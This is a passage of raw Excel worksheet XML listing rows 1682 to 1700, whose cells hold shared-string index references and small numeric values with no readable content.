      <c r="U1682" s="12" t="s">
        <v>12393</v>
      </c>
      <c r="V1682" s="12" t="s">
        <v>5655</v>
      </c>
      <c r="W1682" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1682" s="12">
        <v>1</v>
      </c>
      <c r="Y1682" s="12" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="1683" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1683" s="12">
        <v>9253</v>
      </c>
      <c r="B1683" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1683" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1683" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1683" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1683" s="12" t="s">
        <v>12395</v>
      </c>
      <c r="H1683" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1683" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1683" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K1683" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1683" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1683" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1683" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1683" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1683" s="12" t="s">
        <v>12396</v>
      </c>
      <c r="Q1683" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1683" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1683" s="12" t="s">
        <v>12397</v>
      </c>
      <c r="T1683" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1683" s="12" t="s">
        <v>12398</v>
      </c>
      <c r="V1683" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W1683" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1683" s="12">
        <v>2</v>
      </c>
      <c r="Y1683" s="12" t="s">
        <v>12399</v>
      </c>
    </row>
    <row r="1684" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1684" s="12">
        <v>9254</v>
      </c>
      <c r="B1684" s="12" t="s">
        <v>29878</v>
      </c>
      <c r="D1684" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1684" s="12" t="s">
        <v>29869</v>
      </c>
      <c r="G1684" s="12" t="s">
        <v>12400</v>
      </c>
      <c r="H1684" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1684" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1684" s="12" t="s">
        <v>342</v>
      </c>
      <c r="K1684" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1684" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1684" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1684" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1684" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1684" s="12" t="s">
        <v>12135</v>
      </c>
      <c r="Q1684" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1684" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1684" s="12" t="s">
        <v>12401</v>
      </c>
      <c r="T1684" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1684" s="12" t="s">
        <v>12402</v>
      </c>
      <c r="V1684" s="12" t="s">
        <v>5655</v>
      </c>
      <c r="W1684" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1684" s="12">
        <v>1</v>
      </c>
      <c r="Y1684" s="12" t="s">
        <v>12403</v>
      </c>
    </row>
    <row r="1685" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1685" s="12">
        <v>9257</v>
      </c>
      <c r="B1685" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1685" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1685" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1685" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1685" s="12" t="s">
        <v>12409</v>
      </c>
      <c r="H1685" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1685" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1685" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1685" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1685" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1685" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1685" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1685" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1685" s="12" t="s">
        <v>12135</v>
      </c>
      <c r="Q1685" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1685" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1685" s="12" t="s">
        <v>12410</v>
      </c>
      <c r="T1685" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1685" s="12" t="s">
        <v>12411</v>
      </c>
      <c r="V1685" s="12" t="s">
        <v>4483</v>
      </c>
      <c r="W1685" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1685" s="12">
        <v>10</v>
      </c>
      <c r="Y1685" s="12" t="s">
        <v>12412</v>
      </c>
    </row>
    <row r="1686" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1686" s="12">
        <v>9258</v>
      </c>
      <c r="B1686" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1686" s="12" t="s">
        <v>31071</v>
      </c>
      <c r="D1686" s="12" t="s">
        <v>31072</v>
      </c>
      <c r="F1686" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1686" s="12" t="s">
        <v>12413</v>
      </c>
      <c r="H1686" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1686" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J1686" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K1686" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1686" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1686" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1686" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1686" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1686" s="12" t="s">
        <v>12414</v>
      </c>
      <c r="Q1686" s="12" t="s">
        <v>28312</v>
      </c>
      <c r="R1686" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1686" s="12" t="s">
        <v>12415</v>
      </c>
      <c r="T1686" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1686" s="12" t="s">
        <v>12416</v>
      </c>
      <c r="V1686" s="12" t="s">
        <v>4689</v>
      </c>
      <c r="W1686" s="12" t="s">
        <v>12417</v>
      </c>
      <c r="X1686" s="12">
        <v>69</v>
      </c>
      <c r="Y1686" s="12" t="s">
        <v>12418</v>
      </c>
    </row>
    <row r="1687" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1687" s="12">
        <v>9259</v>
      </c>
      <c r="B1687" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1687" s="12" t="s">
        <v>30300</v>
      </c>
      <c r="E1687" s="12" t="s">
        <v>31551</v>
      </c>
      <c r="F1687" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1687" s="12" t="s">
        <v>12419</v>
      </c>
      <c r="H1687" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1687" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J1687" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K1687" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1687" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1687" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1687" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1687" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1687" s="12" t="s">
        <v>12135</v>
      </c>
      <c r="Q1687" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1687" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1687" s="12" t="s">
        <v>12420</v>
      </c>
      <c r="T1687" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1687" s="12" t="s">
        <v>12421</v>
      </c>
      <c r="V1687" s="12" t="s">
        <v>4689</v>
      </c>
      <c r="W1687" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1687" s="12">
        <v>1</v>
      </c>
      <c r="Y1687" s="12" t="s">
        <v>12422</v>
      </c>
    </row>
    <row r="1688" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1688" s="12">
        <v>9261</v>
      </c>
      <c r="B1688" s="12" t="s">
        <v>31035</v>
      </c>
      <c r="D1688" s="12" t="s">
        <v>31034</v>
      </c>
      <c r="E1688" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1688" s="12" t="s">
        <v>31046</v>
      </c>
      <c r="G1688" s="12" t="s">
        <v>12428</v>
      </c>
      <c r="H1688" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1688" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1688" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K1688" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1688" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1688" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1688" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1688" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1688" s="12" t="s">
        <v>12429</v>
      </c>
      <c r="Q1688" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1688" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1688" s="12" t="s">
        <v>12430</v>
      </c>
      <c r="T1688" s="12" t="s">
        <v>11556</v>
      </c>
      <c r="U1688" s="12" t="s">
        <v>12431</v>
      </c>
      <c r="V1688" s="12" t="s">
        <v>117</v>
      </c>
      <c r="W1688" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1688" s="12">
        <v>29</v>
      </c>
      <c r="Y1688" s="12" t="s">
        <v>12432</v>
      </c>
    </row>
    <row r="1689" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1689" s="12">
        <v>9262</v>
      </c>
      <c r="B1689" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1689" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1689" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1689" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G1689" s="12" t="s">
        <v>12433</v>
      </c>
      <c r="H1689" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1689" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1689" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K1689" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1689" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1689" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1689" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1689" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1689" s="12" t="s">
        <v>11920</v>
      </c>
      <c r="Q1689" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1689" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1689" s="12" t="s">
        <v>12434</v>
      </c>
      <c r="T1689" s="12" t="s">
        <v>12435</v>
      </c>
      <c r="U1689" s="12" t="s">
        <v>12436</v>
      </c>
      <c r="V1689" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W1689" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1689" s="12">
        <v>21</v>
      </c>
      <c r="Y1689" s="12" t="s">
        <v>12437</v>
      </c>
    </row>
    <row r="1690" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1690" s="12">
        <v>9271</v>
      </c>
      <c r="B1690" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1690" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D1690" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1690" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1690" s="12" t="s">
        <v>12438</v>
      </c>
      <c r="H1690" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1690" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J1690" s="12" t="s">
        <v>319</v>
      </c>
      <c r="K1690" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1690" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1690" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1690" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1690" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1690" s="12" t="s">
        <v>9171</v>
      </c>
      <c r="Q1690" s="12" t="s">
        <v>28302</v>
      </c>
      <c r="R1690" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1690" s="12" t="s">
        <v>12439</v>
      </c>
      <c r="T1690" s="12" t="s">
        <v>12440</v>
      </c>
      <c r="U1690" s="12" t="s">
        <v>12441</v>
      </c>
      <c r="V1690" s="12" t="s">
        <v>3816</v>
      </c>
      <c r="W1690" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1690" s="12">
        <v>7</v>
      </c>
      <c r="Y1690" s="12" t="s">
        <v>12442</v>
      </c>
    </row>
    <row r="1691" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1691" s="12">
        <v>9272</v>
      </c>
      <c r="B1691" s="12" t="s">
        <v>31035</v>
      </c>
      <c r="D1691" s="12" t="s">
        <v>31034</v>
      </c>
      <c r="E1691" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1691" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1691" s="12" t="s">
        <v>12443</v>
      </c>
      <c r="H1691" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1691" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1691" s="12" t="s">
        <v>302</v>
      </c>
      <c r="K1691" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1691" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M1691" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1691" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1691" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1691" s="12" t="s">
        <v>12444</v>
      </c>
      <c r="Q1691" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1691" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1691" s="12" t="s">
        <v>12445</v>
      </c>
      <c r="T1691" s="12" t="s">
        <v>7813</v>
      </c>
      <c r="U1691" s="12" t="s">
        <v>12446</v>
      </c>
      <c r="V1691" s="12" t="s">
        <v>1864</v>
      </c>
      <c r="W1691" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1691" s="12">
        <v>4</v>
      </c>
      <c r="Y1691" s="12" t="s">
        <v>12447</v>
      </c>
    </row>
    <row r="1692" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1692" s="12">
        <v>9275</v>
      </c>
      <c r="B1692" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D1692" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1692" s="12" t="s">
        <v>29953</v>
      </c>
      <c r="G1692" s="12" t="s">
        <v>12448</v>
      </c>
      <c r="H1692" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1692" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J1692" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K1692" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1692" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1692" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1692" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1692" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1692" s="12" t="s">
        <v>6633</v>
      </c>
      <c r="Q1692" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1692" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1692" s="12" t="s">
        <v>12449</v>
      </c>
      <c r="T1692" s="12" t="s">
        <v>12450</v>
      </c>
      <c r="U1692" s="12" t="s">
        <v>12451</v>
      </c>
      <c r="V1692" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W1692" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1692" s="12">
        <v>24</v>
      </c>
      <c r="Y1692" s="12" t="s">
        <v>12452</v>
      </c>
    </row>
    <row r="1693" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1693" s="12">
        <v>9280</v>
      </c>
      <c r="B1693" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1693" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D1693" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1693" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1693" s="12" t="s">
        <v>12455</v>
      </c>
      <c r="H1693" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1693" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1693" s="12" t="s">
        <v>302</v>
      </c>
      <c r="K1693" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1693" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1693" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1693" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1693" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1693" s="12" t="s">
        <v>12456</v>
      </c>
      <c r="Q1693" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1693" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1693" s="12" t="s">
        <v>12457</v>
      </c>
      <c r="T1693" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1693" s="12" t="s">
        <v>12458</v>
      </c>
      <c r="V1693" s="12" t="s">
        <v>3672</v>
      </c>
      <c r="W1693" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1693" s="12">
        <v>1</v>
      </c>
      <c r="Y1693" s="12" t="s">
        <v>12459</v>
      </c>
    </row>
    <row r="1694" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1694" s="12">
        <v>9283</v>
      </c>
      <c r="B1694" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1694" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1694" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1694" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1694" s="12" t="s">
        <v>12464</v>
      </c>
      <c r="H1694" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1694" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1694" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K1694" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1694" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1694" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1694" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1694" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1694" s="12" t="s">
        <v>12135</v>
      </c>
      <c r="Q1694" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1694" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1694" s="12" t="s">
        <v>12465</v>
      </c>
      <c r="T1694" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1694" s="12" t="s">
        <v>12466</v>
      </c>
      <c r="V1694" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W1694" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1694" s="12">
        <v>4</v>
      </c>
      <c r="Y1694" s="12" t="s">
        <v>12467</v>
      </c>
    </row>
    <row r="1695" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1695" s="12">
        <v>9284</v>
      </c>
      <c r="B1695" s="12" t="s">
        <v>29956</v>
      </c>
      <c r="D1695" s="12" t="s">
        <v>29954</v>
      </c>
      <c r="E1695" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1695" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1695" s="12" t="s">
        <v>12468</v>
      </c>
      <c r="H1695" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1695" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1695" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K1695" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1695" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1695" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1695" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1695" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1695" s="12" t="s">
        <v>12135</v>
      </c>
      <c r="Q1695" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1695" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1695" s="12" t="s">
        <v>12469</v>
      </c>
      <c r="T1695" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1695" s="12" t="s">
        <v>12470</v>
      </c>
      <c r="V1695" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W1695" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1695" s="12">
        <v>3</v>
      </c>
      <c r="Y1695" s="12" t="s">
        <v>12471</v>
      </c>
    </row>
    <row r="1696" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1696" s="12">
        <v>9286</v>
      </c>
      <c r="B1696" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1696" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1696" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1696" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1696" s="12" t="s">
        <v>12472</v>
      </c>
      <c r="H1696" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1696" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1696" s="12" t="s">
        <v>10261</v>
      </c>
      <c r="K1696" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1696" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1696" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1696" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1696" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1696" s="12" t="s">
        <v>12135</v>
      </c>
      <c r="Q1696" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1696" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1696" s="12" t="s">
        <v>12473</v>
      </c>
      <c r="T1696" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1696" s="12" t="s">
        <v>12474</v>
      </c>
      <c r="V1696" s="12" t="s">
        <v>5309</v>
      </c>
      <c r="W1696" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1696" s="12">
        <v>6</v>
      </c>
      <c r="Y1696" s="12" t="s">
        <v>12475</v>
      </c>
    </row>
    <row r="1697" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1697" s="12">
        <v>9287</v>
      </c>
      <c r="B1697" s="12" t="s">
        <v>30816</v>
      </c>
      <c r="D1697" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1697" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1697" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1697" s="12" t="s">
        <v>12476</v>
      </c>
      <c r="H1697" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1697" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1697" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K1697" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1697" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1697" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1697" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1697" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1697" s="12" t="s">
        <v>12477</v>
      </c>
      <c r="Q1697" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1697" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1697" s="12" t="s">
        <v>12478</v>
      </c>
      <c r="T1697" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1697" s="12" t="s">
        <v>12479</v>
      </c>
      <c r="V1697" s="12" t="s">
        <v>3260</v>
      </c>
      <c r="W1697" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1697" s="12">
        <v>4</v>
      </c>
      <c r="Y1697" s="12" t="s">
        <v>12480</v>
      </c>
    </row>
    <row r="1698" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1698" s="12">
        <v>9288</v>
      </c>
      <c r="B1698" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1698" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1698" s="12" t="s">
        <v>31507</v>
      </c>
      <c r="F1698" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1698" s="12" t="s">
        <v>12481</v>
      </c>
      <c r="H1698" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1698" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1698" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K1698" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1698" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1698" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1698" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1698" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1698" s="12" t="s">
        <v>12482</v>
      </c>
      <c r="Q1698" s="12">
        <v>2.4</v>
      </c>
      <c r="R1698" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1698" s="12" t="s">
        <v>12483</v>
      </c>
      <c r="T1698" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1698" s="12" t="s">
        <v>12484</v>
      </c>
      <c r="V1698" s="12" t="s">
        <v>167</v>
      </c>
      <c r="W1698" s="12">
        <v>9203</v>
      </c>
      <c r="X1698" s="12">
        <v>3</v>
      </c>
      <c r="Y1698" s="12" t="s">
        <v>12485</v>
      </c>
    </row>
    <row r="1699" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1699" s="12">
        <v>9289</v>
      </c>
      <c r="B1699" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1699" s="12" t="s">
        <v>31504</v>
      </c>
      <c r="F1699" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1699" s="12" t="s">
        <v>12486</v>
      </c>
      <c r="H1699" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1699" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J1699" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1699" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1699" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1699" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1699" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1699" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1699" s="12" t="s">
        <v>12487</v>
      </c>
      <c r="Q1699" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1699" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1699" s="12" t="s">
        <v>12488</v>
      </c>
      <c r="T1699" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1699" s="12" t="s">
        <v>12489</v>
      </c>
      <c r="V1699" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W1699" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1699" s="12">
        <v>7</v>
      </c>
      <c r="Y1699" s="12" t="s">
        <v>12490</v>
      </c>
    </row>
    <row r="1700" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1700" s="12">
        <v>9291</v>
      </c>
      <c r="B1700" s="12" t="s">
        <v>31073</v>
      </c>
      <c r="C1700" s="12" t="s">
        <v>31074</v>
      </c>
      <c r="D1700" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1700" s="12" t="s">
        <v>31469</v>
      </c>
      <c r="F1700" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1700" s="12" t="s">
        <v>12491</v>
      </c>
      <c r="H1700" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1700" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J1700" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1700" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1700" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1700" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1700" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1700" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1700" s="12" t="s">
        <v>12492</v>
      </c>
      <c r="Q1700" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1700" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1700" s="12" t="s">
        <v>12493</v>
      </c>
      <c r="T1700" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1700" s="12" t="s">
        <v>12494</v>
      </c>
      <c r="V1700" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W1700" s="12">
        <v>9441</v>
      </c>
      <c r="X1700" s="12">
        <v>33</v>
      </c>
      <c r="Y1700" s="12" t="s">
        <v>12495</v>
      </c>
    </row>
